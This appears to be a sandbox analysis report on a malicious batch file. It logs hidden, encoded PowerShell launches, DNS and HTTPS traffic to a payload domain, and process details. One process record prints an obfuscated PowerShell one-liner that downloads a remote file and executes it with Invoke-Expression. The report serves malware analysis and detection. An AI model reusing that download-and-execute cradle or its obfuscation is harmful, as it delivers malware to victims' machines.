                                                      SSDEEP:96:ne2SE/CvSiAD8dIkokmEO+cOfFk5RAqX25rV75h58FpZWFVqnHcl77wFVqnhUe52:fSECjfdIkoNEfc5HXCgo7/l707A5Cpj
                                                      TLSH:B0C2ECB8C53FBC09014AAAD516F7346854B6E03319B5D2F9FB822C98E172E4DFEB4484
                                                      File Content Preview:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQA
                                                      Icon Hash:9686878b929a9886


                                                      • Total Packets: 10
                                                      • 443 (HTTPS)
                                                      • 53 (DNS)
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Apr 21, 2025 21:59:40.283035994 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.283066988 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:40.283324003 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.289910078 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.289926052 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:40.525094032 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:40.525420904 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.529165983 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.529179096 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:40.529542923 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:40.536914110 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:40.577644110 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:41.067276955 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:41.119544983 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:41.180357933 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:41.180397987 CEST | 443 | 49747 | 172.67.212.124 | 192.168.11.20
                                                      Apr 21, 2025 21:59:41.180486917 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Apr 21, 2025 21:59:41.181097984 CEST | 49747 | 443 | 192.168.11.20 | 172.67.212.124
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Apr 21, 2025 21:59:40.163518906 CEST | 61669 | 53 | 192.168.11.20 | 1.1.1.1
                                                      Apr 21, 2025 21:59:40.278258085 CEST | 53 | 61669 | 1.1.1.1 | 192.168.11.20
                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      Apr 21, 2025 21:59:40.163518906 CEST | 192.168.11.20 | 1.1.1.1 | 0xd007 | Standard query (0) | qqcxq1.dyheg.fun | A (IP address) | IN (0x0001) | false
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Apr 21, 2025 21:59:40.278258085 CEST | 1.1.1.1 | 192.168.11.20 | 0xd007 | No error (0) | qqcxq1.dyheg.fun |  | 172.67.212.124 | A (IP address) | IN (0x0001) | false
                                                      Apr 21, 2025 21:59:40.278258085 CEST | 1.1.1.1 | 192.168.11.20 | 0xd007 | No error (0) | qqcxq1.dyheg.fun |  | 104.21.16.124 | A (IP address) | IN (0x0001) | false
                                                      • qqcxq1.dyheg.fun
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.11.20 | 49747 | 172.67.212.124 | 443 | 4296 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-04-21 19:59:40 UTC | 120 | OUT | GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt HTTP/1.1
                                                      Host: qqcxq1.dyheg.fun
                                                      Connection: Keep-Alive
                                                      2025-04-21 19:59:41 UTC | 474 | IN | HTTP/1.1 404 Not Found
                                                      Date: Mon, 21 Apr 2025 19:59:40 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 193
                                                      Connection: close
                                                      X-Powered-By: Express
                                                      Content-Security-Policy: default-src 'none'
                                                      X-Content-Type-Options: nosniff
                                                      Cf-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      Set-Cookie: connect.sid=s%3AAvjgGrOay8d4iXYwUutebVYKUNI1fQVA.sjFiGZhpzt5Xj0xJqWxuSMo3dzAabzbphFz8KylaUPM; HttpOnly; Path=/
                                                      CF-RAY: 933f76977c2d438d-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-04-21 19:59:41 UTC | 193 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt</pre></body></html>



                                                      Target ID:0
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" "
                                                      Imagebase:0x7ff684870000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6e6aa0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:15:59:36
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e 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
                                                      Imagebase:0x7ff64a690000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:15:59:37
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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
                                                      Imagebase:0x7ff64a690000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:15:59:38
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)
                                                      Imagebase:0x6f0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:59:38
                                                      Start date:21/04/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6e6aa0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.65051202956.00007FFC39140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39140000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffc39140000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                      • Instruction ID: e0f88b804c097e868fbf0394ddf0c8f644a6de57248081032c1f1b710905a641
                                                      • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                      • Instruction Fuzzy Hash: 9301A73110CB0C4FD744EF0CE451AA5B7E0FB89320F50052DE58AC3691DA32E892CB45

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.65014288020.00007FFC39150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffc39150000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                      • Instruction ID: a760bd7ddc11fa7f789e0d8e7d40118901c7edb583891e0acc4f494e03bf2a98
                                                      • Opcode Fuzzy Hash: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                      • Instruction Fuzzy Hash: 2401A73010CB0C8FD744EF0CE451AA5B7E0FB85320F10052DE58AC36A1DA32E892CB45

                                                      Non-executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.65014288020.00007FFC39150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC39150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffc39150000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 032e3122213b03d1012939cebc84bf02abb060563872530f9dd1d912b07b2c5f
                                                      • Instruction ID: 6133bad34345346aece1ceea760c1cc9eaa7e9484daeeaedae8abd21ebc79688
                                                      • Opcode Fuzzy Hash: 032e3122213b03d1012939cebc84bf02abb060563872530f9dd1d912b07b2c5f
                                                      • Instruction Fuzzy Hash: 1C41E25390D7EB9AEB139B2C58610E57FA0EF63750B0A25F7C0D48A883DA192807E374

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6074bbd9d080e90fb1d6df6461e2e920074da3fff8bdb3bfb202a36300fd769a
                                                      • Instruction ID: c5e802bcf611fc4ac9c652afefa12ba57782f5af3cdd3c1a2db4c47612f75506
                                                      • Opcode Fuzzy Hash: 6074bbd9d080e90fb1d6df6461e2e920074da3fff8bdb3bfb202a36300fd769a
                                                      • Instruction Fuzzy Hash: 1C1225B5B042458FC725DB7AC4506AABBB6EFC7210B14C07BD54ACB356DB32D882C7A1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3bb36223450635686b58072f8001f1970ec1752f08e0e84c52fadf872f26a78
                                                      • Instruction ID: e18d73494f79fa62d9dfcb80ee07110a1ae923f682480af29bfd0710db8cdb03
                                                      • Opcode Fuzzy Hash: b3bb36223450635686b58072f8001f1970ec1752f08e0e84c52fadf872f26a78
                                                      • Instruction Fuzzy Hash: B2D14BB570024ABBDB3C9A7488207EA7BA69F93650F14807AD506CB395DB71CDC2C752
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42a826ef18caee70723f277c640cf9159b3b36ec8505c48a89c553a79253125c
                                                      • Instruction ID: 1007f5e8f1698eef044d38afe733ff601cf7887a7c75924d8ae145b342251354
                                                      • Opcode Fuzzy Hash: 42a826ef18caee70723f277c640cf9159b3b36ec8505c48a89c553a79253125c
                                                      • Instruction Fuzzy Hash: EDD1A2B4B01209EFDB14DBA4C450BDEBBB2AF86714F648468E5056F345CB72EC82CB95
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a754da22080f21406c2e0b4727f7f931139cce680a607b3041dc1cf307ef79c
                                                      • Instruction ID: c0337af8a8200e9e032b3361fc56e5da43f6679e8262832230e899da1dd4c7c1
                                                      • Opcode Fuzzy Hash: 6a754da22080f21406c2e0b4727f7f931139cce680a607b3041dc1cf307ef79c
                                                      • Instruction Fuzzy Hash: 58B18EB4B00205AFDB14DF64C440BDEBBB2AF86714F248169E9056F395CB32EC82CB95
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65012973950.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_6ba0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55ad7535f2460c20fb120191ddbe2f0c4dd7b4e541a308b93dcc9718d471471f
                                                      • Instruction ID: 8a8f065f85ee87d9e8f7e2dec665ce172dfceb729af5a3d1c101ae2da37ae2df
                                                      • Opcode Fuzzy Hash: 55ad7535f2460c20fb120191ddbe2f0c4dd7b4e541a308b93dcc9718d471471f
                                                      • Instruction Fuzzy Hash: 5291AF70A04209DFCB45CF98C594AAEFBB2FF48310B28819AD455AB365D335FD91CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65012973950.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_6ba0000_powershell.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.64977320392.00000000046AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_46ad000_powershell.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.64977320392.00000000046AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_46ad000_powershell.jbxd